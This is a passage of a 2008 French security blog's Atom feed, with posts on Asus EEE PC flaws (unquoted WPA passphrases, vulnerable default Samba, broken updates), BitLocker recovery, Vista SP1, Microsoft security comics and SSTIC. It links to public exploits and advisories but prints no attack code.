doit&lt;/a&gt;. Et là, c'est le drame.&lt;br /&gt;&lt;br /&gt;Non seulement ça ne marche pas, mais le message d'erreur présente tous les symptômes d'une injection de commandes &lt;span style="font-style: italic;"&gt;shell&lt;/span&gt;, bien connue dans le milieu du modem adéhaisselle[*].&lt;br /&gt;&lt;br /&gt;Après une bonne heure de débogage, le problème est identifié. Le script &lt;span style="font-family:courier new;"&gt;&lt;span style="font-size:85%;"&gt;/etc/network/if-pre-up.d/0001xandros-wireless-tool&lt;/span&gt;s&lt;/span&gt; fait appel au script &lt;span style=";font-family:courier new;font-size:85%;"  &gt;/usr/sbin/xandros-wpa-config&lt;/span&gt; pour générer dynamiquement la configuration &lt;span style=";font-family:courier new;font-size:85%;"  &gt;wpa_supplicant&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Ces deux scripts ne protègent pas correctement la passphrase par des guillemets, ce qui provoque des erreurs inattendues lorsque la passphrase contient des espaces ... (comme toute phrase normalement constituée).&lt;br /&gt;&lt;br /&gt;On peut tirer deux conclusions relativement différentes de cette histoire :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;C'est beau l'Open Source, je vais avoir mon nom dans un CHANGELOG. Ah non en fait je ne sais pas comment remonter le bogue à Asus, Taiwan.&lt;/li&gt;&lt;li&gt;J'ai perdu une heure de ma vie à fixer un problème trivial. Et personne n'utilise de &lt;span style="font-style: italic;"&gt;passphrase&lt;/span&gt; correcte.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Quel est le lien avec le titre de ce billet ? C'est qu'il ne faut pas changer de résolution trop souvent sur cette même machine :)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/asus.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://newsoft.dyndns.org/blog/asus.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;La bonne nouvelle, c'est que la version de CUPS installée n'écoute que sur l'interface de boucle locale. Cette fois-ci, ça n'est pas &lt;a href="http://blogs.zdnet.com/security/?p=556"&gt;Sun/Solaris&lt;/a&gt; qui prend mais &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=674"&gt;Apple&lt;/a&gt;&lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=674"&gt;/MacOS&lt;/a&gt; :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;[*] On dit bien cédérom, non ?&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-5371698711914497633?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/5371698711914497633/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=5371698711914497633' title='6 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5371698711914497633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5371698711914497633'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/03/rendez-moi-mon-cran-bleu.html' title='Rendez moi mon écran bleu'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5653982382191864140</id><published>2008-03-18T11:18:00.002+01:00</published><updated>2008-03-18T11:40:00.388+01:00</updated><title type='text'>Ceci n'est pas une bâche gratuite</title><content type='html'>Pour mon anniversaire, je me suis offert le pur jouet &lt;span style="font-style: italic;"&gt;geek&lt;/span&gt; : l'&lt;a href="http://eeepc.asus.com/"&gt;Asus EEE PC&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;En France, il semble qu'un opérateur de téléphonie mobile ait obtenu l'exclusivité de sa distribution. Il reste toutefois possible de l'acheter sans abonnement 3G pour la modique somme de 299 euros. Avec 500,000 exemplaires vendus en France (source orale), l'objet est en rupture de stock chez pratiquement toutes les grosses enseignes.&lt;br /&gt;&lt;br /&gt;L'objet est graphiquement séduisant, même si les marges d'écran (et son format tout en longueur) sont assez décevants. La connectique est bonne : plusieurs ports USB, port Ethernet, sortie VGA (indispensable pour les professionnels de la présentation), chipset WiFi Atheros, lecteur SD/MMC. Pas de port PCCard/PCMCIA toutefois.&lt;br /&gt;&lt;br /&gt;Sous le capot on trouve une distribution Linux basée sur Debian : &lt;a href="http://www.xandros.com/"&gt;Xandros&lt;/a&gt;. Attention, le support est &lt;a href="http://support.xandros.com/desktop-faq.php#EeePC"&gt;entièrement assuré par Asus&lt;/a&gt;. Et là, c'est le drame.&lt;br /&gt;&lt;br /&gt;Tout le monde a lu que la version de Samba livrée et démarrée par défaut sur ce système est vulnérable à une &lt;a href="http://blog.metasploit.com/2008/02/rise-security-vs-asus-eee-pc.html"&gt;faille exploitable à distance&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Mais ce qui est beaucoup plus intéressant, c'est que la personnalisation opérée pour le support de la clé USB 3G+ de Huawei (revendue par l'opérateur sus-mentionné) "casse" le système de packages. Aucune mise à jour n'est possible via l'interface graphique, un message d'erreur cryptique de type "try apt-get -f install" étant affiché.&lt;br /&gt;&lt;br /&gt;Hmm, 500,000 systèmes non patchables dans la nature, ça fait réfléchir :)&lt;br /&gt;&lt;br /&gt;Accessoirement, je n'ai jamais réussi à configurer mon accès WPA-PSK via l'interface graphique. "wpa_supplicant.conf" est ton ami.&lt;br /&gt;&lt;br /&gt;En conclusion voici la bâche : Linux pour tous, ça n'est toujours pas pour demain, même avec des grosses icônes :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Quelques infos pour les purs &lt;span style="font-style: italic;"&gt;geeks&lt;/span&gt; : le système est livré avec Python et Ruby en standard, mais pas GCC.  Le processeur est un Intel Centrino classique. L'utilisateur de base (compte "user") est également &lt;span style="font-style: italic;"&gt;sudoer&lt;/span&gt; sans mot de passe. Et le support IPv6 n'est pas compilé dans le noyau :)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-5653982382191864140?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/5653982382191864140/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=5653982382191864140' title='7 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5653982382191864140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5653982382191864140'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/03/ceci-nest-pas-une-bche-gratuite.html' title='Ceci n&apos;est pas une bâche gratuite'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7780683044788449294</id><published>2008-03-13T16:11:00.002+01:00</published><updated>2008-03-13T16:33:50.898+01:00</updated><title type='text'>6 choses sur moi</title><content type='html'>&lt;a href="http://nonop.wordpress.com/2008/03/12/6-choses-sur-moi/"&gt;Nonop&lt;/a&gt;, dans son blog consacré à la sécurité, tente une action de &lt;a href="http://miscmag.com/fr/index.php?2008/03/07/43-misc-36-lutte-informatique-offensive-les-attaques-ciblees-mars-avril-2008-chez-votre-marchand-de-journaux"&gt;Lutte Informatique Offensive&lt;/a&gt; grossière afin de me profiler plus finement.&lt;br /&gt;&lt;br /&gt;On notera que son blog est hébergé chez &lt;a href="http://www.milw0rm.com/exploits/4397"&gt;Wordpress&lt;/a&gt;, mais cet homme n'est pas à une contradiction près, puisqu'il est à la fois consultant et expert &lt;span style="font-family: courier new;"&gt;\LaTex&lt;/span&gt; :)&lt;br /&gt;&lt;br /&gt;Voici donc 6 éléments aléatoires sur moi :&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Comme la plupart des consultants en sécurité, j'ai (eu) pour loisirs différentes activités telles que le jeu de rôle, le paintball et les concerts de hard rock.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;A contrario, je considère la majorité des productions "rap" comme une musique complètement immature et infatuitée - malgré un avis contraire de tous mes collègues directs. J'ai presque plus de sympathie pour la Tectonik (bien que je ne sache toujours pas épeler ce mot correctement).&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Je suis au régime. Et c'est mon anniversaire bientôt (corollaire de la remarque précédente), mais je ne peux pas vous dire quand car c'est une question secrète sur de nombreux sites.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;J'ai déjà fait une estive dans le Vercors avec un troupeau de 3000 têtes et 13 chiens de protection, dans une zone à loups.&lt;/li&gt;&lt;li&gt;J'ai habité 2 ans en Martinique - j'ai donc un degré de plongée sous-marine, le permis bateau hauturier (je peux conduire un super-tanker pour des trajets non-commerciaux :) et un degré en parapente.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Et surtout, je déteste les chaines et les hoaxes en tout genre, qui contribuent à niveler Internet par le bas (comment faire de la sensibilisation sérieuse après ça ?). Je ne ferai donc pas suivre l'invitation à 6 malheureuses victimes :)&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7780683044788449294?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7780683044788449294/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7780683044788449294' title='4 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7780683044788449294'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7780683044788449294'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/03/6-choses-sur-moi.html' title='6 choses sur moi'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-4232070745258023574</id><published>2008-03-03T10:48:00.001+01:00</published><updated>2008-03-03T10:52:14.646+01:00</updated><title type='text'>Echantillon gratuit</title><content type='html'>Pour ceux qui n'ont pas la chance d'être abonnés, voici un échantillon du dernier numéro de &lt;a href="http://hakin9.org/fr"&gt;Hakin9&lt;/a&gt;. Enjoy!&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/hakin9-sample.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/hakin9-sample.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-4232070745258023574?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/4232070745258023574/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=4232070745258023574' title='11 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4232070745258023574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4232070745258023574'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/03/echantillon-gratuit.html' title='Echantillon gratuit'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3880773966202311590</id><published>2008-02-27T21:18:00.003+01:00</published><updated>2008-02-27T21:26:40.454+01:00</updated><title type='text'>C'est bientôt le printemps !</title><content type='html'>Tout fleurit à nouveau, et tout se renouvelle.&lt;br /&gt;&lt;br /&gt;Par exemple la nouvelle version de &lt;a href="http://www.openrce.org/forums/posts/721"&gt;ImpRec&lt;/a&gt;, compatible Vista 64 bits (&lt;a href="http://showusyourwow.msn.com/"&gt;WoW&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;Ou le SP1 pour Vista, que j'ai installé sans trop de problèmes (juste un BSoD :) sur plusieurs machines, et qui a effectivement diminué la consommation mémoire de 10% et augmenté de manière sensible les performances du système de fichiers.&lt;br /&gt;&lt;br /&gt;Ou la nouvelle maquette du &lt;a href="http://hakin9.org/"&gt;Hakin9&lt;/a&gt; de février, qui est arrivé ce jour dans ma boite aux lettres avec comme gros titre "failles critiques sur le protocole SSH" (rien que ça).&lt;br /&gt;&lt;br /&gt;Ou la nouvelle maquette du prochain &lt;a href="http://miscmag.com/"&gt;MISC&lt;/a&gt;, mais chut !&lt;br /&gt;&lt;br /&gt;Non, ce dont je veux surtout vous parler c'est la sortie publique du projet &lt;a href="http://www.msuiche.net/2008/02/26/sandman-10080226-is-out/"&gt;SandMan&lt;/a&gt; (version 32 bits uniquement) - avec support Python pour les amateurs :) Et oui, comme nous ne sommes pas retenus au &lt;a href="http://www.sstic.org/SSTIC08/info.do"&gt;SSTIC&lt;/a&gt; cette année, vous n'aurez pas à attendre le mois de juin !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3880773966202311590?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3880773966202311590/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3880773966202311590' title='9 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3880773966202311590'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3880773966202311590'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/02/cest-bientt-le-printemps.html' title='C&apos;est bientôt le printemps !'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3183455738678794641</id><published>2008-02-22T21:40:00.002+01:00</published><updated>2008-02-22T21:52:59.180+01:00</updated><title type='text'>Microsoft x3</title><content type='html'>&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;#1 BitLocker&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Mon portable sous Vista Ultimate est chiffré avec BitLocker + TPM 1.2. Et là, c'est le drame : je dois rendre la machine d'urgence. Comment récupérer les données alors que je n'ai pas eu le temps de les déchiffrer ? Il ne me reste que le disque dur entre les mains.&lt;br /&gt;&lt;br /&gt;A tout hasard, je branche le disque dans une machine identique. Il me demande mon mot de passe de recouvrement (que j'ai soigneusement noté à l'installation, bien m'en a pris).&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/BitLocker-small.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/BitLocker-small.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Le système démarre. Je désactive BitLocker, le temps d'initialiser le nouveau TPM et de rebooter. Je réactive BitLocker et tout fonctionne parfaitement ! Avouez que vous n'y croyez pas :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;#2 Vista SP1&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Le SP1 pour Vista est disponible depuis quelques jours en version finale auprès des abonnées Technet+. Bilan des courses : 1,13 Go à télécharger (pour la versions 4 langues 32 et 64 bits). Au passage le téléchargement s'effectue avec un joli ActiveX de chez Akamai. &lt;span style="font-style: italic;"&gt;I love the smell of homemade software in the morning&lt;/span&gt; :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;#3 Microsoft et l'Open Source&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;C'est inattendu, c'est incroyable et pourtant ... tous les formats de fichiers et tous les protocoles Microsoft sont désormais disponibles publiquement et libres de droits en format PDF et XPS !&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/interop/docs/OfficeBinaryFormats.mspx"&gt;Ici les formats Office&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/cc216517.aspx"&gt;Ici les formats Windows&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;#4 (Bonus)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Et pendant ce temps là &lt;a href="http://www.linformaticien.com/Actualit%C3%A9s/tabid/58/newsid496/3864/failles-dans-le-noyau-linux/Default.aspx"&gt;dans l'Open Source historique.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span id="dnn_ctr496_ContentPane" align="left"&gt;&lt;span class="viewnewsarticle"&gt;"&lt;span style="font-style: italic;"&gt;Selon l’organisme secunia, les problèmes sont liés aux fonctions présentes dans l’appel système fs/splice.c. Les experts divergent sur la nature plus ou moins critique du bug mais, toutefois, tous s’accordent sur la nécessité d’appliquer le patch en installant la version la plus récente du noyau.&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Allez, voilà &lt;a href="http://www.milw0rm.com/exploits/5092"&gt;de quoi mettre les experts d'accord&lt;/a&gt; :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3183455738678794641?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3183455738678794641/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3183455738678794641' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3183455738678794641'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3183455738678794641'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/02/microsoft-x3.html' title='Microsoft x3'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-203110581962947655</id><published>2008-02-18T15:58:00.002+01:00</published><updated>2008-02-18T16:14:17.657+01:00</updated><title type='text'>Hello Secure World ?</title><content type='html'>&lt;a href="http://www.microsoft.com/click/hellosecureworld/default.mspx"&gt;Hello Secure World&lt;/a&gt;, c'est le titre de cette nouvelle opération de communication Microsoft autour de la sécurité. Avec installation du plugin &lt;a href="http://silverlight.net/"&gt;SilverLight&lt;/a&gt; obligatoire ...&lt;br /&gt;&lt;br /&gt;Parmi les ressources proposées, on y trouve un ensemble de &lt;em&gt;strips&lt;/em&gt; destinés à la sensibilisation des non-inités (à mon avis, c'est pas gagné quand même). Puisque le serveur est en HTTP, ne vérifie pas le Referer ni le Cookie, voici les liens directs sniffés sur le cable :)&lt;br /&gt;&lt;br /&gt;L'écriture de code sécurisé :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_001_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_001_web.jpg&lt;/a&gt;&lt;br /&gt;L'analyse statique :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_002_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_002_web.jpg&lt;/a&gt;&lt;br /&gt;L'écriture de code sécurisé, &lt;em&gt;bis&lt;/em&gt; :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_003_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_003_web.jpg&lt;/a&gt;&lt;br /&gt;Le filtrage des entrées utilisateur :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_004_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_004_web.jpg&lt;/a&gt;&lt;br /&gt;L'explication du &lt;em&gt;buffer overflow&lt;/em&gt; (wow!) :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_005_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_005_web.jpg&lt;/a&gt;&lt;br /&gt;L'explication du &lt;em&gt;cross-site scripting&lt;/em&gt; :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_006_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_006_web.jpg&lt;/a&gt;&lt;br /&gt;La cryptographie :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_008_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_008_web.jpg&lt;/a&gt;&lt;br /&gt;La défense en profondeur :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_009_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_009_web.jpg&lt;/a&gt;&lt;br /&gt;Le Man-in-the-Middle :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_011_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_011_web.jpg&lt;/a&gt;&lt;br /&gt;L'usurpation d'identité :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_012_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_012_web.jpg&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pour finir, en voici 2 qui me semblent assez polémiques.&lt;br /&gt;&lt;br /&gt;Google Hacking :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_010_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_010_web.jpg&lt;/a&gt;&lt;br /&gt;Google en train d'embrocher des sites Web ? Pourquoi ne pas parler de &lt;a href="http://www.live.com/"&gt;Windows Live Search&lt;/a&gt; hacking plutôt ? Peut-être que le nom est trop long pour tenir dans une bulle :)&lt;br /&gt;&lt;br /&gt;La faille PDF :&lt;br /&gt;&lt;a href="http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_007_web.jpg"&gt;http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_007_web.jpg&lt;/a&gt;&lt;br /&gt;Sans aller jusqu'à dire qu'Acrobat Reader et le format PDF sont sûrs, il me semble quand même que ça s'est terminé en &lt;a href="http://blogs.technet.com/msrc/archive/2007/10/10/msrc-blog-additional-details-and-background-on-security-advisory-943521.aspx"&gt;patch Microsoft &lt;/a&gt;pour l'API ShellExecute(), cette affaire ...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-203110581962947655?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/203110581962947655/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=203110581962947655' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/203110581962947655'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/203110581962947655'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/02/hello-secure-world.html' title='Hello Secure World ?'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-8008978897101241910</id><published>2008-02-16T22:08:00.002+01:00</published><updated>2008-02-16T22:21:47.096+01:00</updated><title type='text'>Est-ce bien légal ?</title><content type='html'>Voilà une annonce Google AdSense, vue sur &lt;a href="http://www.clubic.com/"&gt;Clubic.com&lt;/a&gt;, qui ne manque pas de piquant :&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/legal.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/legal.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Dans le cas où cette offre ne serait pas légale, je me demande qui est responsable de quoi devant la loi, entre Clubic, Google, les régies publicitaires et le site final.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-8008978897101241910?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/8008978897101241910/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=8008978897101241910' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8008978897101241910'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8008978897101241910'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/02/est-ce-bien-lgal.html' title='Est-ce bien légal ?'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-8887095810596080571</id><published>2008-02-13T21:41:00.004+01:00</published><updated>2008-02-14T23:06:34.690+01:00</updated><title type='text'>Le programme du SSTIC 2008 est en ligne</title><content type='html'>Bon d'accord, c'est un &lt;a href="http://www.sstic.org/SSTIC08/programme.do"&gt;programme prévisionnel&lt;/a&gt;, mais ça veut dire qu'il va falloir bientôt surveiller les inscriptions (le point critique chaque année, tout est vendu en 3 jours !).&lt;br /&gt;&lt;br /&gt;On remarquera que cette année, il n'y a qu'une seule équipe de recherche qui est sur-représentée, contrairement aux &lt;a href="http://www.sstic.org/SSTIC07/programme.do"&gt;années précédentes&lt;/a&gt;. Bravo au comité de programme d'avoir su rétablir la balance, en injectant du sang neuf.&lt;br /&gt;&lt;br /&gt;Il faut avouer que le site de cette équipe est en symbiose avec celui du SSTIC :&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://esec.fr.sogeti.com/seminaire/index.php"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: left; cursor: pointer;" src="http://newsoft.dyndns.org/blog/ESEC-Small.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.sstic.org/SSTIC08/programme.do"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: right; cursor: pointer;" src="http://newsoft.dyndns.org/blog/SSTIC-Small.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Gageons que leurs interventions seront également à la hauteur des prestations habituelles du SSTIC !&lt;br /&gt;&lt;br /&gt;&lt;!-- Rien d'étonnant, lorsqu'on sait que leur chef d'équipe est également fondateur du SSTIC, et rédacteur en chef du magazine MISC.  Tiens en parlant de MISC, les deux derniers numéros (n°35 : &lt;a href="http://miscmag.com/fr/index.php?2008/01/03/41-misc-n35-autopsie-forensic-comment-reagir-apres-un-incident"&gt;autopsie et forensics&lt;/a&gt;, HS n°1 : &lt;a href="http://miscmag.com/fr/index.php?2007/10/05/36-hors-serie-1-les-tests-d-intrusion"&gt;tests d'intrusion&lt;/a&gt;) présentaient des articles sur le &lt;a 